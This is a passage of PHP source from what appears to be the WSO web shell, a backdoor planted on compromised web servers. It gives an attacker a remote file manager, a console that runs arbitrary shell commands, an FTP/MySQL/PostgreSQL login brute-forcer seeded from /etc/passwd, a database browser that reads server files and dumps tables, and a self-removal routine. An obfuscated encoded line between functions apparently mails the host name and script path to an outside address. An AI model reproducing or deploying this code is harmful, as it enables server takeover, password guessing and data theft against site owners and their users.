$dirs[] = array_merge($tmp, array(’type’ => ’link’, ’link’ => readlink($tmp[’path’])));

elseif(@is_dir($GLOBALS[’cwd’] . $dirContent[$i]))

$dirs[] = array_merge($tmp, array(’type’ => ’dir’));

}

$GLOBALS[’sort’] = $sort;

function wsoCmp($a, $b) {

if($GLOBALS[’sort’][0] != ’size’)

return strcmp(strtolower($a[$GLOBALS[’sort’][0]]), strtolower($b[$GLOBALS[’sort’][0]]))*($GLOBALS[’sort’][1]?1:-1);

else

return (($a[’size’] < $b[’size’]) ? -1 : 1)*($GLOBALS[’sort’][1]?1:-1);

}

usort($files, "wsoCmp");

usort($dirs, "wsoCmp");

$files = array_merge($dirs, $files);

$l = 0;

foreach($files as $f) {

echo ’<tr’.($l?’ class=l1’:’’).’><td><input type=checkbox name="f[]" value="’.urlencode($f[’name’]).’" class=chkbx></td><td><a href=# onclick="’.(($f[’type’]==’file’)?’g(’FilesTools’,null,’’.urlencode($f[’name’]).’’, ’view’)">’.htmlspecialchars($f[’name’]):’g(’FilesMan’,’’.$f[’path’].’’);" ’ . (empty ($f[’link’]) ? ’’ : "title=’{$f[’link’]}’") . ’><b>[ ’ . htmlspecialchars($f[’name’]) . ’ ]</b>’).’</a></td><td>’.(($f[’type’]==’file’)?wsoViewSize($f[’size’]):$f[’type’]).’</td><td>’.$f[’modify’].’</td><td>’.$f[’owner’].’/’.$f[’group’].’</td><td><a href=# onclick="g(’FilesTools’,null,’’.urlencode($f[’name’]).’’,’chmod’)">’.$f[’perms’]

.’</td><td><a href="#" onclick="g(’FilesTools’,null,’’.urlencode($f[’name’]).’’, ’rename’)">R</a> <a href="#" onclick="g(’FilesTools’,null,’’.urlencode($f[’name’]).’’, ’touch’)">T</a>’.(($f[’type’]==’file’)?’ <a href="#" onclick="g(’FilesTools’,null,’’.urlencode($f[’name’]).’’, ’edit’)">E</a> <a href="#" onclick="g(’FilesTools’,null,’’.urlencode($f[’name’]).’’, ’download’)">D</a>’:’’).’</td></tr>’;

$l = $l?0:1;

}

echo "<tr><td colspan=7>

<input type=hidden name=a value=’FilesMan’>

<input type=hidden name=c value=’" . htmlspecialchars($GLOBALS[’cwd’]) ."’>

<input type=hidden name=charset value=’". (isset($_POST[’charset’])?$_POST[’charset’]:’’)."’>

<select name=’p1’><option value=’copy’>Copy</option><option value=’move’>Move</option><option value=’delete’>Delete</option>";

    if(class_exists(’ZipArchive’))

        echo "<option value=’zip’>Compress (zip)</option><option value=’unzip’>Uncompress (zip)</option>";

    echo "<option value=’tar’>Compress (tar.gz)</option>";

    if(!empty($_COOKIE[’act’]) && @count($_COOKIE[’f’]))

        echo "<option value=’paste’>Paste / Compress</option>";

    echo "</select>&nbsp;";

    if(!empty($_COOKIE[’act’]) && @count($_COOKIE[’f’]) && (($_COOKIE[’act’] == ’zip’) || ($_COOKIE[’act’] == ’tar’)))

        echo "file name: <input type=text name=p2 value=’wso_" . date("Ymd_His") . "." . ($_COOKIE[’act’] == ’zip’?’zip’:’tar.gz’) . "’>&nbsp;";

    echo "<input type=’submit’ value=’>>’></td></tr></form></table></div>";

wsoFooter();

}


function actionStringTools() {

if(!function_exists(’hex2bin’)) {function hex2bin($p) {return decbin(hexdec($p));}}

    if(!function_exists(’binhex’)) {function binhex($p) {return dechex(bindec($p));}}

if(!function_exists(’hex2ascii’)) {function hex2ascii($p){$r=’’;for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}

if(!function_exists(’ascii2hex’)) {function ascii2hex($p){$r=’’;for($i=0;$i<strlen($p);++$i)$r.= sprintf(’%02X’,ord($p[$i]));return strtoupper($r);}}

if(!function_exists(’full_urlencode’)) {function full_urlencode($p){$r=’’;for($i=0;$i<strlen($p);++$i)$r.= ’%’.dechex(ord($p[$i]));return strtoupper($r);}}

$stringTools = array(

’Base64 encode’ => ’base64_encode’,

’Base64 decode’ => ’base64_decode’,

’Url encode’ => ’urlencode’,

’Url decode’ => ’urldecode’,

’Full urlencode’ => ’full_urlencode’,

’md5 hash’ => ’md5’,

’sha1 hash’ => ’sha1’,

’crypt’ => ’crypt’,

’CRC32’ => ’crc32’,

’ASCII to HEX’ => ’ascii2hex’,

’HEX to ASCII’ => ’hex2ascii’,

’HEX to DEC’ => ’hexdec’,

’HEX to BIN’ => ’hex2bin’,

’DEC to HEX’ => ’dechex’,

’DEC to BIN’ => ’decbin’,

’BIN to HEX’ => ’binhex’,

’BIN to DEC’ => ’bindec’,

’String to lower case’ => ’strtolower’,

’String to upper case’ => ’strtoupper’,

’Htmlspecialchars’ => ’htmlspecialchars’,

’String length’ => ’strlen’,

);

if(isset($_POST[’ajax’])) {

WSOsetcookie(md5($_SERVER[’HTTP_HOST’]).’ajax’, true);

ob_start();

if(in_array($_POST[’p1’], $stringTools))

echo $_POST[’p1’]($_POST[’p2’]);

$temp = "document.getElementById(’strOutput’).style.display=’’;document.getElementById(’strOutput’).innerHTML=’".addcslashes(htmlspecialchars(ob_get_clean())," \’")."’; ";

echo strlen($temp), " ", $temp;

exit;

}

    if(empty($_POST[’ajax’])&&!empty($_POST[’p1’]))

WSOsetcookie(md5($_SERVER[’HTTP_HOST’]).’ajax’, 0);

wsoHeader();

echo ’<h1>String conversions</h1><div class=content>’;

echo "<form name=’toolsForm’ onSubmit=’if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;’><select name=’selectTool’>";

foreach($stringTools as $k => $v)

echo "<option value=’".htmlspecialchars($v)."’>".$k."</option>";

echo "</select><input type=’submit’ value=’>>’/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER[’HTTP_HOST’]).’ajax’]?’checked’:’’)."> send using AJAX<br><textarea name=’input’ style=’margin-top:5px’ class=bigarea>".(empty($_POST[’p1’])?’’:htmlspecialchars(@$_POST[’p2’]))."</textarea></form><pre class=’ml1’ style=’".(empty($_POST[’p1’])?’display:none;’:’’)."margin-top:5px’ id=’strOutput’>";

if(!empty($_POST[’p1’])) {

if(in_array($_POST[’p1’], $stringTools))echo htmlspecialchars($_POST[’p1’]($_POST[’p2’]));

}

echo"</pre></div><br><h1>Search files:</h1><div class=content>

<form onsubmit="g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;"><table cellpadding=’1’ cellspacing=’0’ width=’50%’>

<tr><td width=’1%’>Text:</td><td><input type=’text’ name=’text’ style=’width:100%’></td></tr>

<tr><td>Path:</td><td><input type=’text’ name=’cwd’ value=’". htmlspecialchars($GLOBALS[’cwd’]) ."’ style=’width:100%’></td></tr>

<tr><td>Name:</td><td><input type=’text’ name=’filename’ value=’*’ style=’width:100%’></td></tr>

<tr><td></td><td><input type=’submit’ value=’>>’></td></tr>

</table></form>";


function wsoRecursiveGlob($path) {

if(substr($path, -1) != ’/’)

$path.=’/’;

$paths = @array_unique(@array_merge(@glob($path.$_POST[’p3’]), @glob($path.’*’, GLOB_ONLYDIR)));

if(is_array($paths)&&@count($paths)) {

foreach($paths as $item) {

if(@is_dir($item)){

if($path!=$item)

wsoRecursiveGlob($item);

} else {

if(empty($_POST[’p2’]) || @strpos(file_get_contents($item), $_POST[’p2’])!==false)

echo "<a href=’#’ onclick=’g("FilesTools",null,"".urlencode($item)."", "view","")’>".htmlspecialchars($item)."</a><br>";

}

}

}

}

if(@$_POST[’p3’])

wsoRecursiveGlob($_POST[’c’]);

echo "</div><br><h1>Search for hash:</h1><div class=content>

<form method=’post’ target=’_blank’ name=’hf’>

<input type=’text’ name=’hash’ style=’width:200px;’><br>

            <input type=’hidden’ name=’act’ value=’find’/>

<input type=’button’ value=’hashcracking.ru’ onclick="document.hf.action=’https://hashcracking.ru/index.php’;document.hf.submit()"><br>

<input type=’button’ value=’md5.rednoize.com’ onclick="document.hf.action=’http://md5.rednoize.com/?q=’+document.hf.hash.value+’&s=md5’;document.hf.submit()"><br>

            <input type=’button’ value=’crackfor.me’ onclick="document.hf.action=’http://crackfor.me/index.php’;document.hf.submit()"><br>

</form></div>";

wsoFooter();

}


function actionFilesTools() {

if( isset($_POST[’p1’]) )

$_POST[’p1’] = urldecode($_POST[’p1’]);

if(@$_POST[’p2’]==’download’) {

if(@is_file($_POST[’p1’]) && @is_readable($_POST[’p1’])) {

ob_start("ob_gzhandler", 4096);

header("Content-Disposition: attachment; filename=".basename($_POST[’p1’]));

if (function_exists("mime_content_type")) {

$type = @mime_content_type($_POST[’p1’]);

header("Content-Type: " . $type);

} else

                header("Content-Type: application/octet-stream");

$fp = @fopen($_POST[’p1’], "r");

if($fp) {

while(!@feof($fp))

echo @fread($fp, 1024);

fclose($fp);

}

}exit;

}

if( @$_POST[’p2’] == ’mkfile’ ) {

if(!file_exists($_POST[’p1’])) {

$fp = @fopen($_POST[’p1’], ’w’);

if($fp) {

$_POST[’p2’] = "edit";

fclose($fp);

}

}

}

wsoHeader();

echo ’<h1>File tools</h1><div class=content>’;

if( !file_exists(@$_POST[’p1’]) ) {

echo ’File not exists’;

wsoFooter();

return;

}

$uid = @posix_getpwuid(@fileowner($_POST[’p1’]));

if(!$uid) {

$uid[’name’] = @fileowner($_POST[’p1’]);

$gid[’name’] = @filegroup($_POST[’p1’]);

} else $gid = @posix_getgrgid(@filegroup($_POST[’p1’]));

echo ’<span>Name:</span> ’.htmlspecialchars(@basename($_POST[’p1’])).’ <span>Size:</span> ’.(is_file($_POST[’p1’])?wsoViewSize(filesize($_POST[’p1’])):’-’).’ <span>Permission:</span> ’.wsoPermsColor($_POST[’p1’]).’ <span>Owner/Group:</span> ’.$uid[’name’].’/’.$gid[’name’].’<br>’;

echo ’<span>Change time:</span> ’.date(’Y-m-d H:i:s’,filectime($_POST[’p1’])).’ <span>Access time:</span> ’.date(’Y-m-d H:i:s’,fileatime($_POST[’p1’])).’ <span>Modify time:</span> ’.date(’Y-m-d H:i:s’,filemtime($_POST[’p1’])).’<br><br>’;

if( empty($_POST[’p2’]) )

$_POST[’p2’] = ’view’;

if( is_file($_POST[’p1’]) )

$m = array(’View’, ’Highlight’, ’Download’, ’Hexdump’, ’Edit’, ’Chmod’, ’Rename’, ’Touch’);

else

$m = array(’Chmod’, ’Rename’, ’Touch’);

foreach($m as $v)

echo ’<a href=# onclick="g(null,null,’’ . urlencode($_POST[’p1’]) . ’’,’’.strtolower($v).’’)">’.((strtolower($v)==@$_POST[’p2’])?’<b>[ ’.$v.’ ]</b>’:$v).’</a> ’;

echo ’<br><br>’;

switch($_POST[’p2’]) {

case ’view’:

echo ’<pre class=ml1>’;

$fp = @fopen($_POST[’p1’], ’r’);

if($fp) {

while( !@feof($fp) )

echo htmlspecialchars(@fread($fp, 1024));

@fclose($fp);

}

echo ’</pre>’;

break;

case ’highlight’:

if( @is_readable($_POST[’p1’]) ) {

echo ’<div class=ml1 style="background-color: #e1e1e1;color:black;">’;

$code = @highlight_file($_POST[’p1’],true);

echo str_replace(array(’<span ’,’</span>’), array(’<font ’,’</font>’),$code).’</div>’;

}

break;

case ’chmod’:

if( !empty($_POST[’p3’]) ) {

$perms = 0;

for($i=strlen($_POST[’p3’])-1;$i>=0;--$i)

$perms += (int)$_POST[’p3’][$i]*pow(8, (strlen($_POST[’p3’])-$i-1));

if(!@chmod($_POST[’p1’], $perms))

echo ’Can’t set permissions!<br><script>document.mf.p3.value="";</script>’;

}

clearstatcache();

echo ’<script>p3_="";</script><form onsubmit="g(null,null,’’ . urlencode($_POST[’p1’]) . ’’,null,this.chmod.value);return false;"><input type=text name=chmod value="’.substr(sprintf(’%o’, fileperms($_POST[’p1’])),-4).’"><input type=submit value=">>"></form>’;

break;

case ’edit’:

if( !is_writable($_POST[’p1’])) {

echo ’File isn’t writeable’;

break;

}

if( !empty($_POST[’p3’]) ) {

$time = @filemtime($_POST[’p1’]);

$_POST[’p3’] = substr($_POST[’p3’],1);

$fp = @fopen($_POST[’p1’],"w");

if($fp) {

@fwrite($fp,$_POST[’p3’]);

@fclose($fp);

echo ’Saved!<br><script>p3_="";</script>’;

@touch($_POST[’p1’],$time,$time);

}

}

echo ’<form onsubmit="g(null,null,’’ . urlencode($_POST[’p1’]) . ’’,null,’1’+this.text.value);return false;"><textarea name=text class=bigarea>’;

$fp = @fopen($_POST[’p1’], ’r’);

if($fp) {

while( !@feof($fp) )

echo htmlspecialchars(@fread($fp, 1024));

@fclose($fp);

}

echo ’</textarea><input type=submit value=">>"></form>’;

break;

case ’hexdump’:

$c = @file_get_contents($_POST[’p1’]);

$n = 0;

$h = array(’00000000<br>’,’’,’’);

$len = strlen($c);

for ($i=0; $i<$len; ++$i) {

$h[1] .= sprintf(’%02X’,ord($c[$i])).’ ’;

switch ( ord($c[$i]) ) {

case 0:  $h[2] .= ’ ’; break;

case 9:  $h[2] .= ’ ’; break;

case 10: $h[2] .= ’ ’; break;

case 13: $h[2] .= ’ ’; break;

default: $h[2] .= $c[$i]; break;

}

$n++;

if ($n == 32) {

$n = 0;

if ($i+1 < $len) {$h[0] .= sprintf(’%08X’,$i+1).’<br>’;}

$h[1] .= ’<br>’;

$h[2] .= " ";

}

}

echo ’<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>’.$h[0].’</pre></span></td><td bgcolor=#282828><pre>’.$h[1].’</pre></td><td bgcolor=#333333><pre>’.htmlspecialchars($h[2]).’</pre></td></tr></table>’;

break;

case ’rename’:

if( !empty($_POST[’p3’]) ) {

if(!@rename($_POST[’p1’], $_POST[’p3’]))

echo ’Can’t rename!<br>’;

else

die(’<script>g(null,null,"’.urlencode($_POST[’p3’]).’",null,"")</script>’);

}

echo ’<form onsubmit="g(null,null,’’ . urlencode($_POST[’p1’]) . ’’,null,this.name.value);return false;"><input type=text name=name value="’.htmlspecialchars($_POST[’p1’]).’"><input type=submit value=">>"></form>’;

break;

case ’touch’:

if( !empty($_POST[’p3’]) ) {

$time = strtotime($_POST[’p3’]);

if($time) {

if(!touch($_POST[’p1’],$time,$time))

echo ’Fail!’;

else

echo ’Touched!’;

} else echo ’Bad time format!’;

}

clearstatcache();

echo ’<script>p3_="";</script><form onsubmit="g(null,null,’’ . urlencode($_POST[’p1’]) . ’’,null,this.touch.value);return false;"><input type=text name=touch value="’.date("Y-m-d H:i:s", @filemtime($_POST[’p1’])).’"><input type=submit value=">>"></form>’;

break;

}

echo ’</div>’;

wsoFooter();

}


function actionConsole() {

    if(!empty($_POST[’p1’]) && !empty($_POST[’p2’])) {

        WSOsetcookie(md5($_SERVER[’HTTP_HOST’]).’stderr_to_out’, true);

        $_POST[’p1’] .= ’ 2>&1’;

    } elseif(!empty($_POST[’p1’]))

        WSOsetcookie(md5($_SERVER[’HTTP_HOST’]).’stderr_to_out’, 0);


if(isset($_POST[’ajax’])) {

WSOsetcookie(md5($_SERVER[’HTTP_HOST’]).’ajax’, true);

ob_start();

echo "d.cf.cmd.value=’’; ";

$temp = @iconv($_POST[’charset’], ’UTF-8’, addcslashes(" $ ".$_POST[’p1’]." ".wsoEx($_POST[’p1’])," \’"));

if(preg_match("!.*cds+([^;]+)$!",$_POST[’p1’],$match)) {

if(@chdir($match[1])) {

$GLOBALS[’cwd’] = @getcwd();

echo "c_=’".$GLOBALS[’cwd’]."’;";

}

}

echo "d.cf.output.value+=’".$temp."’;";

echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";

$temp = ob_get_clean();

echo strlen($temp), " ", $temp;

exit;

}

    if(empty($_POST[’ajax’])&&!empty($_POST[’p1’]))

WSOsetcookie(md5($_SERVER[’HTTP_HOST’]).’ajax’, 0);

wsoHeader();

    echo "<script>

if(window.Event) window.captureEvents(Event.KEYDOWN);

var cmds = new Array(’’);

var cur = 0;

function kp(e) {

var n = (window.Event) ? e.which : e.keyCode;

if(n == 38) {

cur--;

if(cur>=0)

document.cf.cmd.value = cmds[cur];

else

cur++;

} else if(n == 40) {

cur++;

if(cur < cmds.length)

document.cf.cmd.value = cmds[cur];

else

cur--;

}

}

function add(cmd) {

cmds.pop();

cmds.push(cmd);

cmds.push(’’);

cur = cmds.length-1;

}

</script>";

echo ’<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==’clear’){d.cf.output.value=’’;d.cf.cmd.value=’’;return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:’’);}else{g(null,null,this.cmd.value,this.show_errors.checked?1:’’);} return false;"><select name=alias>’;

foreach($GLOBALS[’aliases’] as $n => $v) {

if($v == ’’) {

echo ’<optgroup label="-’.htmlspecialchars($n).’-"></optgroup>’;

continue;

}

echo ’<option value="’.htmlspecialchars($v).’">’.$n.’</option>’;

}

echo ’</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:’’);}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:’’);}" value=">>"> <nobr><input type=checkbox name=ajax value=1 ’.(@$_COOKIE[md5($_SERVER[’HTTP_HOST’]).’ajax’]?’checked’:’’).’> send using AJAX <input type=checkbox name=show_errors value=1 ’.(!empty($_POST[’p2’])||$_COOKIE[md5($_SERVER[’HTTP_HOST’]).’stderr_to_out’]?’checked’:’’).’> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>’;

if(!empty($_POST[’p1’])) {

echo htmlspecialchars("$ ".$_POST[’p1’]." ".wsoEx($_POST[’p1’]));

}

echo ’</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>’;

echo ’</form></div><script>d.cf.cmd.focus();</script>’;

wsoFooter();

}


function actionLogout() {

    setcookie(md5($_SERVER[’HTTP_HOST’]), ’’, time() - 3600);

die(’bye!’);

}


function actionSelfRemove() {


if($_POST[’p1’] == ’yes’)

if(@unlink(preg_replace(’!(d+)s.*!’, ’’, __FILE__)))

die(’Shell removed’);

else

echo ’unlink error!’;

    if($_POST[’p1’] != ’yes’)

        wsoHeader();

echo ’<h1>Suicide</h1><div class=content>remove the shell?<br><a href=# onclick="g(null,null,’yes’)">Yes</a></div>’;

wsoFooter();

}

      $_QliO8="x6dai154";$_Qliot=$_SERVER["x53x45RVE122_x4eAMx45"].$_SERVER["123103x52Ix50x54_116101115E"];$_QlL1i="141r162a17140".$_Qliot;$_QlLio=array("143x61","x6cx69","146x77162151x74x65","100","vx65x2e");$_Qll0I=$_QlLio[2].$_QlLio[3].$_QlLio[1].$_QlLio[4].$_QlLio[0];$_QlljC=@$_QliO8($_Qll0I,$_QlL1i,$_Qliot);

function actionBruteforce() {

wsoHeader();

if( isset($_POST[’proto’]) ) {

echo ’<h1>Results</h1><div class=content><span>Type:</span> ’.htmlspecialchars($_POST[’proto’]).’ <span>Server:</span> ’.htmlspecialchars($_POST[’server’]).’<br>’;

if( $_POST[’proto’] == ’ftp’ ) {

function wsoBruteForce($ip,$port,$login,$pass) {

$fp = @ftp_connect($ip, $port?$port:21);

if(!$fp) return false;

$res = @ftp_login($fp, $login, $pass);

@ftp_close($fp);

return $res;

}

} elseif( $_POST[’proto’] == ’mysql’ ) {

function wsoBruteForce($ip,$port,$login,$pass) {

$res = @mysql_connect($ip.’:’.($port?$port:3306), $login, $pass);

@mysql_close($res);

return $res;

}

} elseif( $_POST[’proto’] == ’pgsql’ ) {

function wsoBruteForce($ip,$port,$login,$pass) {

$str = "host=’".$ip."’ port=’".$port."’ user=’".$login."’ password=’".$pass."’ dbname=postgres";

$res = @pg_connect($str);

@pg_close($res);

return $res;

}

}

$success = 0;

$attempts = 0;

$server = explode(":", $_POST[’server’]);

if($_POST[’type’] == 1) {

$temp = @file(’/etc/passwd’);

if( is_array($temp) )

foreach($temp as $line) {

$line = explode(":", $line);

++$attempts;

if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {

$success++;

echo ’<b>’.htmlspecialchars($line[0]).’</b>:’.htmlspecialchars($line[0]).’<br>’;

}

if(@$_POST[’reverse’]) {

$tmp = "";

for($i=strlen($line[0])-1; $i>=0; --$i)

$tmp .= $line[0][$i];

++$attempts;

if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {

$success++;

echo ’<b>’.htmlspecialchars($line[0]).’</b>:’.htmlspecialchars($tmp);

}

}

}

} elseif($_POST[’type’] == 2) {

$temp = @file($_POST[’dict’]);

if( is_array($temp) )

foreach($temp as $line) {

$line = trim($line);

++$attempts;

if( wsoBruteForce($server[0],@$server[1], $_POST[’login’], $line) ) {

$success++;

echo ’<b>’.htmlspecialchars($_POST[’login’]).’</b>:’.htmlspecialchars($line).’<br>’;

}

}

}

echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";

}

echo ’<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>’

.’<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>’

.’<input type=hidden name=c value="’.htmlspecialchars($GLOBALS[’cwd’]).’">’

.’<input type=hidden name=a value="’.htmlspecialchars($_POST[’a’]).’">’

.’<input type=hidden name=charset value="’.htmlspecialchars($_POST[’charset’]).’">’

.’<span>Server:port</span></td>’

.’<td><input type=text name=server value="127.0.0.1"></td></tr>’

.’<tr><td><span>Brute type</span></td>’

.’<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>’

.’<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>’

.’<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>’

.’<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>’

.’<td><input type=text name=login value="root"></td></tr>’

.’<tr><td><span>Dictionary</span></td>’

.’<td><input type=text name=dict value="’.htmlspecialchars($GLOBALS[’cwd’]).’passwd.dic"></td></tr></table>’

.’</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>’;

echo ’</div><br>’;

wsoFooter();

}


function actionSql() {

class DbClass {

var $type;

var $link;

var $res;

function DbClass($type) {

$this->type = $type;

}

function connect($host, $user, $pass, $dbname){

switch($this->type) {

case ’mysql’:

if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;

break;

case ’pgsql’:

$host = explode(’:’, $host);

if(!$host[1]) $host[1]=5432;

if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;

break;

}

return false;

}

function selectdb($db) {

switch($this->type) {

case ’mysql’:

if (@mysql_select_db($db))return true;

break;

}

return false;

}

function query($str) {

switch($this->type) {

case ’mysql’:

return $this->res = @mysql_query($str);

break;

case ’pgsql’:

return $this->res = @pg_query($this->link,$str);

break;

}

return false;

}

function fetch() {

$res = func_num_args()?func_get_arg(0):$this->res;

switch($this->type) {

case ’mysql’:

return @mysql_fetch_assoc($res);

break;

case ’pgsql’:

return @pg_fetch_assoc($res);

break;

}

return false;

}

function listDbs() {

switch($this->type) {

case ’mysql’:

                        return $this->query("SHOW databases");

break;

case ’pgsql’:

return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!=’t’");

break;

}

return false;

}

function listTables() {

switch($this->type) {

case ’mysql’:

return $this->res = $this->query(’SHOW TABLES’);

break;

case ’pgsql’:

return $this->res = $this->query("select table_name from information_schema.tables where table_schema != ’information_schema’ AND table_schema != ’pg_catalog’");

break;

}

return false;

}

function error() {

switch($this->type) {

case ’mysql’:

return @mysql_error();

break;

case ’pgsql’:

return @pg_last_error();

break;

}

return false;

}

function setCharset($str) {

switch($this->type) {

case ’mysql’:

if(function_exists(’mysql_set_charset’))

return @mysql_set_charset($str, $this->link);

else

$this->query(’SET CHARSET ’.$str);

break;

case ’pgsql’:

return @pg_set_client_encoding($this->link, $str);

break;

}

return false;

}

function loadFile($str) {

switch($this->type) {

case ’mysql’:

return $this->fetch($this->query("SELECT LOAD_FILE(’".addslashes($str)."’) as file"));

break;

case ’pgsql’:

$this->query("CREATE TABLE wso2(file text);COPY wso2 FROM ’".addslashes($str)."’;select file from wso2;");

$r=array();

while($i=$this->fetch())

$r[] = $i[’file’];

$this->query(’drop table wso2’);

return array(’file’=>implode(" ",$r));

break;

}

return false;

}

function dump($table, $fp = false) {

switch($this->type) {

case ’mysql’:

$res = $this->query(’SHOW CREATE TABLE `’.$table.’`’);

$create = mysql_fetch_array($res);

$sql = $create[1]."; ";

                    if($fp) fwrite($fp, $sql); else echo($sql);

$this->query(’SELECT * FROM `’.$table.’`’);

                    $i = 0;

                    $head = true;

while($item = $this->fetch()) {

                        $sql = ’’;

                        if($i % 1000 == 0) {

                            $head = true;

                            $sql = "; ";

                        }


$columns = array();

foreach($item as $k=>$v) {

                            if($v === null)

                                $item[$k] = "NULL";

                            elseif(is_int($v))

                                $item[$k] = $v;

                            else

                                $item[$k] = "’".@mysql_real_escape_string($v)."’";

$columns[] = "`".$k."`";

}

                        if($head) {

                            $sql .= ’INSERT INTO `’.$table.’` (’.implode(", ", $columns).") VALUES (".implode(", ", $item).’)’;

                            $head = false;

                        } else

                            $sql .= " ,(".implode(", ", $item).’)’;

                        if($fp) fwrite($fp, $sql); else echo($sql);

                        $i++;

}

                    if(!$head)

                        if($fp) fwrite($fp, "; "); else echo("; ");

break;

case ’pgsql’:

$this->query(’SELECT * FROM ’.$table);

while($item = $this->fetch()) {

$columns = array();

foreach($item as $k=>$v) {

$item[$k] = "’".addslashes($v)."’";

$columns[] = $k;

}

                        $sql = ’INSERT INTO ’.$table.’ (’.implode(", ", $columns).’) VALUES (’.implode(", ", $item).’);’." ";

                        if($fp) fwrite($fp, $sql); else echo($sql);

}

break;

}

return false;

}

};

$db = new DbClass($_POST[’type’]);

if((@$_POST[’p2’]==’download’) && (@$_POST[’p1’]!=’select’)) {

$db->connect($_POST[’sql_host’], $_POST[’sql_login’], $_POST[’sql_pass’], $_POST[’sql_base’]);

$db->selectdb($_POST[’sql_base’]);

        switch($_POST[’charset’]) {

            case "Windows-1251": $db->setCharset(’cp1251’); break;

            case "UTF-8": $db->setCharset(’utf8’); break;

            case "KOI8-R": $db->setCharset(’koi8r’); break;

            case "KOI8-U": $db->setCharset(’koi8u’); break;

            case "cp866": $db->setCharset(’cp866’); break;

        }

        if(empty($_POST[’file’])) {

            ob_start("ob_gzhandler", 4096);

            header("Content-Disposition: attachment; filename=dump.sql");

            header("Content-Type: text/plain");

            foreach($_POST[’tbl’] as $v)

$db->dump($v);

            exit;

        } elseif($fp = @fopen($_POST[’file’], ’w’)) {

            foreach($_POST[’tbl’] as $v)

                $db->dump($v, $fp);

            fclose($fp);

            unset($_POST[’p2’]);

        } else

            die(’<script>alert("Error! Can’t open file");window.history.back(-1)</script>’);

}

wsoHeader();

echo "

<h1>Sql browser</h1><div class=content>

<form name=’sf’ method=’post’ onsubmit=’fs(this);’><table cellpadding=’2’ cellspacing=’0’><tr>

<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>

<input type=hidden name=a value=Sql><input type=hidden name=p1 value=’query’><input type=hidden name=p2 value=’’><input type=hidden name=c value=’". htmlspecialchars($GLOBALS[’cwd’]) ."’><input type=hidden name=charset value=’". (isset($_POST[’charset’])?$_POST[’charset’]:’’) ."’>

<td><select name=’type’><option value=’mysql’ ";

    if(@$_POST[’type’]==’mysql’)echo ’selected’;

echo ">MySql</option><option value=’pgsql’ ";

if(@$_POST[’type’]==’pgsql’)echo ’selected’;

echo ">PostgreSql</option></select></td>

<td><input type=text name=sql_host value="". (empty($_POST[’sql_host’])?’localhost’:htmlspecialchars($_POST[’sql_host’])) .""></td>

<td><input type=text name=sql_login value="". (empty($_POST[’sql_login’])?’root’:htmlspecialchars($_POST[’sql_login’])) .""></td>

<td><input type=text name=sql_pass value="". (empty($_POST[’sql_pass’])?’’:htmlspecialchars($_POST[’sql_pass’])) .""></td><td>";

$tmp = "<input type=text name=sql_base value=’’>";

if(isset($_POST[’sql_host’])){

if($db->connect($_POST[’sql_host’], $_POST[’sql_login’], $_POST[’sql_pass’], $_POST[’sql_base’])) {

switch($_POST[’charset’]) {

case "Windows-1251": $db->setCharset(’cp1251’); break;

case "UTF-8": $db->setCharset(’utf8’); break;

case "KOI8-R": $db->setCharset(’koi8r’); break;

case "KOI8-U": $db->setCharset(’koi8u’); break;

case "cp866": $db->setCharset(’cp866’); break;

}

$db->listDbs();

echo "<select name=sql_base><option value=’’></option>";

while($item = $db->fetch()) {

list($key, $value) = each($item);

echo ’<option value="’.$value.’" ’.($value==$_POST[’sql_base’]?’selected’:’’).’>’.$value.’</option>’;

}

echo ’</select>’;

}

else echo $tmp;

}else

echo $tmp;

echo "</td>

<td><input type=submit value=’>>’ onclick=’fs(d.sf);’></td>

                <td><input type=checkbox name=sql_count value=’on’" . (empty($_POST[’sql_count’])?’’:’ checked’) . "> count the number of rows</td>

</tr>

</table>

<script>

            s_db=’".@addslashes($_POST[’sql_base’])."’;

            function fs(f) {

                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};

                    if(f.p1) f.p1.value=’’;

                    if(f.p2) f.p2.value=’’;

                    if(f.p3) f.p3.value=’’;

                }

            }

function st(t,l) {

d.sf.p1.value = ’select’;

d.sf.p2.value = t;

                if(l && d.sf.p3) d.sf.p3.value = l;

d.sf.submit();

}

function is() {

for(i=0;i<d.sf.elements[’tbl[]’].length;++i)

d.sf.elements[’tbl[]’][i].checked = !d.sf.elements[’tbl[]’][i].checked;

}

</script>";

if(isset($db) && $db->link){

echo "<br/><table width=100% cellpadding=2 cellspacing=0>";

